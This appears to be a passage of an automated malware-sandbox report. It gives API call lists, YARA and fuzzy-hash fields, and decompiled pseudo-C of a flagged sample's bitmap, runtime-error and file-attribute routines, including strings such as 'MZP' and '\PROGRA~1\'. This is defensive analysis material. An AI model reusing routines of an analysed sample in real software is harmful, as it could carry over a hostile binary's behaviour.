                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040641D
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00406435
                                                                                                                          • DeleteDC.GDI32 ref: 00406465
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2504469172-0
                                                                                                                          • Opcode ID: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                                                                          • Instruction ID: a9e686f7fc2ed882930d99cc47d1dbb646c45f2a2f24960de351e96cc7451368
                                                                                                                          • Opcode Fuzzy Hash: becf70a625b9a30146d272fd5bbb048cf5534f59ad9606d33f7b6e5dd878182e
                                                                                                                          • Instruction Fuzzy Hash: AE5195B1204200AFDB05AF65CC86F2B3AA9EF94314F1145BEBA45BF1D7C639DC618798
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018), ref: 0040FD5A
                                                                                                                          • 73BBA590.GDI32(00000000), ref: 0040FD6F
                                                                                                                          • 73BBAC50.USER32(00000000,00000000,00000000), ref: 0040FD81
                                                                                                                          • 73BBA520.GDI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD8E
                                                                                                                          • 73BBB380.USER32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040FD96
                                                                                                                          • SelectObject.GDI32(00000000), ref: 0040FD9F
                                                                                                                          • CreateSolidBrush.GDI32(00000000), ref: 0040FDB8
                                                                                                                          • FillRect.USER32 ref: 0040FDC6
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040FDCB
                                                                                                                          • SelectObject.GDI32(?), ref: 0040FDDC
                                                                                                                          • SetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0040FDF3
                                                                                                                          • SelectObject.GDI32(?), ref: 0040FE09
                                                                                                                          • GetDIBits.GDI32(?,00000000,00000000,?,00000000,?,00000000), ref: 0040FE7C
                                                                                                                          • 73BBA7A0.GDI32(?,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040FEA7
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FEB5
                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0040FECD
                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0040FEFD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Select$BitsDelete$A520A590B380BrushCreateFillRectSolid
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2504469172-0
                                                                                                                          • Opcode ID: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                                                                          • Instruction ID: 8bfa987d25260d88ee3329e71298cc77801f48d1f8f03ee880f1b7424a85638e
                                                                                                                          • Opcode Fuzzy Hash: 8a590e84f39245ca4d04667659fb543d88ec70770c2b886d6545f3c605bbe461
                                                                                                                          • Instruction Fuzzy Hash: A051D4716042006FDB14AF65CC82F2B3B69EF84314F1148BEB905BB6D7D639EC088B98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 57%
                                                                                                                          			E00406218(void* __eax, void* __ecx, void* __edx, void* __ebp, void* __eflags) {
                                                                                                                          				struct HDC__* _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				intOrPtr _v40;
                                                                                                                          				struct HDC__* _v44;
                                                                                                                          				struct HDC__* _v60;
                                                                                                                          				struct HDC__* _v68;
                                                                                                                          				struct HDC__* _v72;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* _t64;
                                                                                                                          				void* _t66;
                                                                                                                          				struct HBITMAP__* _t69;
                                                                                                                          				void* _t75;
                                                                                                                          				void* _t78;
                                                                                                                          				int _t79;
                                                                                                                          				int _t82;
                                                                                                                          				int _t87;
                                                                                                                          				void* _t88;
                                                                                                                          				void* _t92;
                                                                                                                          				void* _t101;
                                                                                                                          				void* _t108;
                                                                                                                          				void* _t111;
                                                                                                                          				void* _t113;
                                                                                                                          				void* _t115;
                                                                                                                          				void* _t133;
                                                                                                                          				struct HDC__* _t135;
                                                                                                                          				struct HDC__* _t137;
                                                                                                                          				void* _t139;
                                                                                                                          				int* _t140;
                                                                                                                          				struct HDC__* _t142;
                                                                                                                          				signed int _t144;
                                                                                                                          				struct HBITMAP__* _t147;
                                                                                                                          				struct HBITMAP__* _t148;
                                                                                                                          				RECT* _t149;
                                                                                                                          				void* _t151;
                                                                                                                          
                                                                                                                          				_t151 = __eflags;
                                                                                                                          				_t113 = __eax;
                                                                                                                          				_t64 = E00406144(__eax);
                                                                                                                          				if(_t151 == 0) {
                                                                                                                          					L7:
                                                                                                                          					if(__eflags != 0) {
                                                                                                                          						E00406144(_t64);
                                                                                                                          						_t66 = _t64;
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							asm("pushad");
                                                                                                                          							_t115 = _t66;
                                                                                                                          							 *((intOrPtr*)(_t115 + 0x34))();
                                                                                                                          							 *((intOrPtr*)(_t115 + 0x28)) = 0;
                                                                                                                          							 *((intOrPtr*)(_t115 + 0x56)) = 0;
                                                                                                                          							 *((intOrPtr*)(_t115 + 0x5a)) = 0;
                                                                                                                          							asm("jecxz 0x13");
                                                                                                                          							_t69 =  *(_t115 + 0x3d);
                                                                                                                          							_t144 =  *(_t69 + 4);
                                                                                                                          							_t142 =  *(_t69 + 8);
                                                                                                                          							__eflags = _t142;
                                                                                                                          							if(_t142 < 0) {
                                                                                                                          								_t142 =  ~_t142;
                                                                                                                          							}
                                                                                                                          							_push(0);
                                                                                                                          							L00404108();
                                                                                                                          							_push(_t69);
                                                                                                                          							__eflags =  *((char*)(_t115 + 0x3c)) - 1;
                                                                                                                          							if( *((char*)(_t115 + 0x3c)) != 1) {
                                                                                                                          								asm("jecxz 0xfffffff2");
                                                                                                                          								_t147 = 0;
                                                                                                                          								_t129 =  *(_t115 + 0x18);
                                                                                                                          								_push(E00405F70( *((intOrPtr*)(_t115 + 0x1c)),  *((intOrPtr*)(( *(_t115 + 0x49) & 0x000000ff) + 0x409188)),  *(_t115 + 0x18)));
                                                                                                                          								__eflags =  *(_t115 + 0x49) - 5;
                                                                                                                          								if( *(_t115 + 0x49) == 5) {
                                                                                                                          									E0040600C(_t74, _t129);
                                                                                                                          								}
                                                                                                                          								_pop(_t75);
                                                                                                                          								_push(_t75);
                                                                                                                          								_push(E00406268(_t75) *  *(_t115 + 0x18));
                                                                                                                          								_t78 = E00402448(E00406268(_t75) *  *(_t115 + 0x18));
                                                                                                                          								_push(_t78);
                                                                                                                          								_push(0);
                                                                                                                          								_push(_v12);
                                                                                                                          								_push(_t78);
                                                                                                                          								_t79 =  *(_t115 + 0x18);
                                                                                                                          								__eflags = _t79 - _t142;
                                                                                                                          								if(__eflags > 0) {
                                                                                                                          									_t79 = _t142;
                                                                                                                          								}
                                                                                                                          								_t82 = GetDIBits(_v8, E00406154(_t115, __eflags), 0, _t79, ??, ??, ??);
                                                                                                                          								_t132 =  *(_t115 + 0x18);
                                                                                                                          								__eflags = _t132 - _t142;
                                                                                                                          								if(_t132 > _t142) {
                                                                                                                          									_t132 = _t142;
                                                                                                                          								}
                                                                                                                          								__eflags = _t82 - _t132;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_pop(_t88);
                                                                                                                          									E00402468(_t88);
                                                                                                                          									_push(0);
                                                                                                                          									_push(0);
                                                                                                                          									_push(0);
                                                                                                                          									_push(_t149);
                                                                                                                          									_push(0);
                                                                                                                          									_push(_v40);
                                                                                                                          									_push(_v36);
                                                                                                                          									L00404110();
                                                                                                                          									_t144 = _t144 ^ 0xffffffff;
                                                                                                                          									_t147 = 0;
                                                                                                                          									_t92 = SelectObject(_v60, 0);
                                                                                                                          									_t132 = _v68;
                                                                                                                          									__eflags = 0;
                                                                                                                          									E00406094(_t115, 0, _v68, 0, 0);
                                                                                                                          									SelectObject(_v72, _t92);
                                                                                                                          								}
                                                                                                                          								E00406024(_t115, _t115, _t132, __eflags);
                                                                                                                          								_pop( *_t51);
                                                                                                                          								_pop( *_t52);
                                                                                                                          								_pop( *_t53);
                                                                                                                          								 *(_t115 + 0x20) = _t147;
                                                                                                                          								__eflags = _t144;
                                                                                                                          								 *(_t115 + 0x72) = 0;
                                                                                                                          								if(_t144 < 0) {
                                                                                                                          									_t56 = _t115 + 0x72;
                                                                                                                          									 *_t56 =  &( *(_t115 + 0x72)->i);
                                                                                                                          									__eflags =  *_t56;
                                                                                                                          								}
                                                                                                                          								goto L25;
                                                                                                                          							} else {
                                                                                                                          								_push(0);
                                                                                                                          								L00404178();
                                                                                                                          								_push(_t69);
                                                                                                                          								_push( *(_t115 + 0x18));
                                                                                                                          								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                                                                                          								_push(_t69);
                                                                                                                          								L00404100();
                                                                                                                          								_t148 = _t69;
                                                                                                                          								L00404190();
                                                                                                                          								_t135 = 0;
                                                                                                                          								_push(_t135);
                                                                                                                          								_push(SelectObject(_t135, _t148));
                                                                                                                          								_push( *(_t115 + 0x18));
                                                                                                                          								_push( *((intOrPtr*)(_t115 + 0x1c)));
                                                                                                                          								_push(0);
                                                                                                                          								_t101 = CreateSolidBrush(E0040469C( *((intOrPtr*)(_t115 + 0x2c))));
                                                                                                                          								_t136 = _t149;
                                                                                                                          								FillRect(_v44, _t149, _t101);
                                                                                                                          								DeleteObject(_t101);
                                                                                                                          								asm("jecxz 0x24");
                                                                                                                          								SelectObject(_v60, 0);
                                                                                                                          								SetDIBits(_v68, _t148, 0,  *(_t115 + 0x18),  *(_t115 + 0x41),  *(_t115 + 0x3d), 0);
                                                                                                                          								E00406024(_t115, _t115, _t136, __eflags);
                                                                                                                          								 *(_t115 + 0x20) = _t148;
                                                                                                                          								L25:
                                                                                                                          								asm("jecxz 0xa");
                                                                                                                          								_pop(_t133);
                                                                                                                          								 *((intOrPtr*)( *((intOrPtr*)(_t115 + 0x4a))))(_t133);
                                                                                                                          								_t87 = DeleteDC(_t142);
                                                                                                                          								asm("popad");
                                                                                                                          								return _t87;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						return _t66;
                                                                                                                          					} else {
                                                                                                                          						return _t64;
                                                                                                                          					}
                                                                                                                          				} else {
                                                                                                                          					_push(__edx);
                                                                                                                          					_t64 = E0040648C(_t113, __edx);
                                                                                                                          					_pop(_t137);
                                                                                                                          					if(_t64 == _t137) {
                                                                                                                          						goto L7;
                                                                                                                          					} else {
                                                                                                                          						_t108 = _t113;
                                                                                                                          						if(_t137 != 0) {
                                                                                                                          							 *(_t113 + 0x49) = _t137;
                                                                                                                          							__eflags = _t137 - 5;
                                                                                                                          							if(_t137 == 5) {
                                                                                                                          								_t137 = _t137 - 1;
                                                                                                                          								__eflags = _t137;
                                                                                                                          							}
                                                                                                                          							L27();
                                                                                                                          							_t111 = E00405F98( *( *((intOrPtr*)(_t113 + 0x3d)) + 0xe) & 0x0000ffff, 0);
                                                                                                                          							_t139 = _t137;
                                                                                                                          							__eflags = _t111 - _t139;
                                                                                                                          							_t64 = _t113;
                                                                                                                          							goto L7;
                                                                                                                          						} else {
                                                                                                                          							_t140 =  &(_t137->i);
                                                                                                                          							if(_t140 !=  *(_t108 + 0x3c)) {
                                                                                                                          								 *(_t108 + 0x3c) = _t140;
                                                                                                                          								L9();
                                                                                                                          								return _t108;
                                                                                                                          							}
                                                                                                                          							return _t108;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}






































                                                                                                                          0x0040645d
                                                                                                                          0x00406463
                                                                                                                          0x00406465
                                                                                                                          0x0040646a
                                                                                                                          0x00000000
                                                                                                                          0x0040646a
                                                                                                                          0x004062e1
                                                                                                                          0x0040646b
                                                                                                                          0x00406264
                                                                                                                          0x00406264
                                                                                                                          0x00406264
                                                                                                                          0x00406222
                                                                                                                          0x00406224
                                                                                                                          0x00406225
                                                                                                                          0x0040622a
                                                                                                                          0x0040622d
                                                                                                                          0x00000000
                                                                                                                          0x0040622f
                                                                                                                          0x00406231
                                                                                                                          0x00406233
                                                                                                                          0x0040623c
                                                                                                                          0x0040623f
                                                                                                                          0x00406242
                                                                                                                          0x00406244
                                                                                                                          0x00406244
                                                                                                                          0x00406244
                                                                                                                          0x00406248
                                                                                                                          0x00406254
                                                                                                                          0x00406259
                                                                                                                          0x0040625a
                                                                                                                          0x0040625c
                                                                                                                          0x00000000
                                                                                                                          0x00406235
                                                                                                                          0x00406236
                                                                                                                          0x0040647f
                                                                                                                          0x00406481
                                                                                                                          0x00406484
                                                                                                                          0x00000000
                                                                                                                          0x00406484
                                                                                                                          0x00406489
                                                                                                                          0x00406489
                                                                                                                          0x00406233
                                                                                                                          0x0040622d

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                                                                          • Instruction ID: ab27ac02cf2ee968932468d3d4c2958694adf508222a5702edd9c4bd71c6629c
                                                                                                                          • Opcode Fuzzy Hash: ba240bc75a83fef15349861cf5e056242dc807168d5e068429e02be0b81ae198
                                                                                                                          • Instruction Fuzzy Hash: A73184B12002006FDB04BF658C85F2A3A69AFD4314F5244BEBA06BF2D7D639DCA1975C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                                                                          • Instruction ID: 4cf276d7622785da586c8009362eb5643f0905aac9be693976ada0e9182b1a0c
                                                                                                                          • Opcode Fuzzy Hash: 7f5595bea6b46ab1a6bb8acb478b4169ff457dd0ad7d021d976c048766c6e429
                                                                                                                          • Instruction Fuzzy Hash: 7E3102706041006FDB24AF65CC82F2A3A6AAF84308F5144BFB901BF6DBC63DDC499758
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410198
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004101B7
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00410221
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00410356
                                                                                                                          • CopyImage.USER32 ref: 0041040F
                                                                                                                          • CopyImage.USER32 ref: 00410496
                                                                                                                          • CopyImage.USER32 ref: 004101EA
                                                                                                                            • Part of subcall function 0040FC78: GetObjectA.GDI32(00000000,00000018), ref: 0040FC8A
                                                                                                                            • Part of subcall function 0040FBEC: 73BBAC50.USER32(00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC0F
                                                                                                                            • Part of subcall function 0040FBEC: 73BBA7A0.GDI32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0040FBC8), ref: 0040FC2A
                                                                                                                            • Part of subcall function 0040FBEC: 73BBB380.USER32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?), ref: 0040FC35
                                                                                                                          • CopyImage.USER32 ref: 0041052B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CopyImage$B380
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1117845954-3887548279
                                                                                                                          • Opcode ID: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                                                                          • Instruction ID: a4bd64b3fd63d48472c9145484328d1e8b73c1e654bc960fa13628ff834bc38b
                                                                                                                          • Opcode Fuzzy Hash: 39a78b10d7024776e478eb120b2c750533621c1c387b0d6abdafb054a84c2d99
                                                                                                                          • Instruction Fuzzy Hash: 05E15134E002189BDB20EBA9C885BDEB7B5AF48314F50807BF505F7382DA799D85CB59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,Function_0000748C), ref: 00410DB0
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410DC2
                                                                                                                            • Part of subcall function 0040E600: CreateFileA.KERNEL32(?,40000400,40000400,00000000,40000400,40000400,00000000,0040E6CC,00000000,Function_00004C66), ref: 0040E620
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,Function_0000748C), ref: 00410EF9
                                                                                                                            • Part of subcall function 0040E65C: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,?,0040E75F,00000000,Function_00004CE6), ref: 0040E667
                                                                                                                            • Part of subcall function 0040E64C: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00410C11,00000000,Function_000071BF), ref: 0040E654
                                                                                                                            • Part of subcall function 0040E678: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040E682
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                                                                          • API String ID: 997383822-4093836345
                                                                                                                          • Opcode ID: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                                                                          • Instruction ID: 2f0480c31d9fc6f6f6bd4ff7e20304d554dec23e4d9677c87e7e87a18c1bd8bd
                                                                                                                          • Opcode Fuzzy Hash: 0ffbdbd9c4ce7faddcbce69822ed9a4bb391a8709582c286f98777811686da55
                                                                                                                          • Instruction Fuzzy Hash: B1515570B003089BDB14FB6ECC8269EB3659F55308F5089BBB404B73D2DA7D9E854B59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E,0040BF7B), ref: 0040C9E9
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E,?,?,?,?,?,?,?,0040CB1E), ref: 0040C9EF
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA04
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Function_00002FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,0040CA7E), ref: 0040CA0A
                                                                                                                          • MessageBoxA.USER32 ref: 0040CA28
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                          • Opcode ID: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                                                                          • Instruction ID: e346e235dea6380484e37d32cf1e26acb754014f59db45d581b47c6c48365cc5
                                                                                                                          • Opcode Fuzzy Hash: 3a9f92cc1793bd906a324f4b2820f365d342c083d99e01712e2be0f2c1988d27
                                                                                                                          • Instruction Fuzzy Hash: 58F0CDA0BC430878E620E3A4AE0AF5A221C4348B15F60463FB220741D3C6BC4894C72F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E00402F18(void* __ecx) {
                                                                                                                          				long _v4;
                                                                                                                          				int _t3;
                                                                                                                          
                                                                                                                          				if( *0x40a034 == 0) {
                                                                                                                          					if( *0x409024 == 0) {
                                                                                                                          						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                                                                          					}
                                                                                                                          					return _t3;
                                                                                                                          				} else {
                                                                                                                          					if( *0x40a208 == 0xd7b2 &&  *0x40a210 > 0) {
                                                                                                                          						 *0x40a220();
                                                                                                                          					}
                                                                                                                          					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                                                                          					return WriteFile(GetStdHandle(0xfffffff5), E00402FA0, 2,  &_v4, 0);
                                                                                                                          				}
                                                                                                                          			}






                                                                                                                          APIs
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000,00000000), ref: 00402F51
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000,?,00000001,00403086,004024E3,0040252B,00000000), ref: 00402F57
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F6C
                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,00402FA0,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00402FE6,?,00000000), ref: 00402F72
                                                                                                                          • MessageBoxA.USER32 ref: 00402F90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                          • Opcode ID: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                                                                          • Instruction ID: 6c3b7e42d3c7ef80f9ab9078d96d43441ff44d86987642024caec186a117226f
                                                                                                                          • Opcode Fuzzy Hash: ef94cf404df6f7a5011913507198a6df15fac8ea4ed7590dcb41cd545e331a2c
                                                                                                                          • Instruction Fuzzy Hash: 5AF0B47168438538E630A3609F0EF5A226C4744B99F20467FB660781F6C7FC58C4921E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 71%
                                                                                                                          			E0040184C() {
                                                                                                                          				void* _t2;
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t14;
                                                                                                                          				intOrPtr* _t19;
                                                                                                                          				intOrPtr _t23;
                                                                                                                          				intOrPtr _t26;
                                                                                                                          				intOrPtr _t28;
                                                                                                                          
                                                                                                                          				_t26 = _t28;
                                                                                                                          				if( *0x40a5ac == 0) {
                                                                                                                          					return _t2;
                                                                                                                          				} else {
                                                                                                                          					_push(_t26);
                                                                                                                          					_push(E00401922);
                                                                                                                          					_push( *[fs:edx]);
                                                                                                                          					 *[fs:edx] = _t28;
                                                                                                                          					if( *0x40a035 != 0) {
                                                                                                                          						_push(0x40a5b4);
                                                                                                                          						L004010E4();
                                                                                                                          					}
                                                                                                                          					 *0x40a5ac = 0;
                                                                                                                          					_t3 =  *0x40a60c; // 0x63f8a0
                                                                                                                          					LocalFree(_t3);
                                                                                                                          					 *0x40a60c = 0;
                                                                                                                          					_t19 =  *0x40a5d4; // 0x640eb4
                                                                                                                          					while(_t19 != 0x40a5d4) {
                                                                                                                          						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                                                                          						_t19 =  *_t19;
                                                                                                                          					}
                                                                                                                          					E0040114C(0x40a5d4);
                                                                                                                          					E0040114C(0x40a5e4);
                                                                                                                          					E0040114C(0x40a610);
                                                                                                                          					_t14 =  *0x40a5cc; // 0x6408a0
                                                                                                                          					while(_t14 != 0) {
                                                                                                                          						 *0x40a5cc =  *_t14;
                                                                                                                          						LocalFree(_t14);
                                                                                                                          						_t14 =  *0x40a5cc; // 0x6408a0
                                                                                                                          					}
                                                                                                                          					_pop(_t23);
                                                                                                                          					 *[fs:eax] = _t23;
                                                                                                                          					_push(0x401929);
                                                                                                                          					if( *0x40a035 != 0) {
                                                                                                                          						_push(0x40a5b4);
                                                                                                                          						L004010EC();
                                                                                                                          					}
                                                                                                                          					_push(0x40a5b4);
                                                                                                                          					L004010F4();
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,00000000,00401922), ref: 00401879
                                                                                                                          • LocalFree.KERNEL32(0063F8A0,00000000,00401922), ref: 0040188B
                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,0063F8A0,00000000,00401922), ref: 004018AA
                                                                                                                          • LocalFree.KERNEL32(006408A0,?,00000000,00008000,0063F8A0,00000000,00401922), ref: 004018E9
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401929,0063F8A0,00000000,00401922), ref: 00401912
                                                                                                                          • RtlDeleteCriticalSection.KERNEL32(0040A5B4,00401929,0063F8A0,00000000,00401922), ref: 0040191C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3782394904-0
                                                                                                                          • Opcode ID: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                                                                          • Instruction ID: 2c75820c4bf2e6ed0dab6d922aeac6927b5e2e4dc662dc8188128fe539cf0cf0
                                                                                                                          • Opcode Fuzzy Hash: 7abece6553a5b58226f49e8cc0da803076ff11b1e6c82b72a6b22a285eae2257
                                                                                                                          • Instruction Fuzzy Hash: FD1182B1704380AEE715EBA69D92B1277E8B745708F14847BF140B66F2C67D9860CB1E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

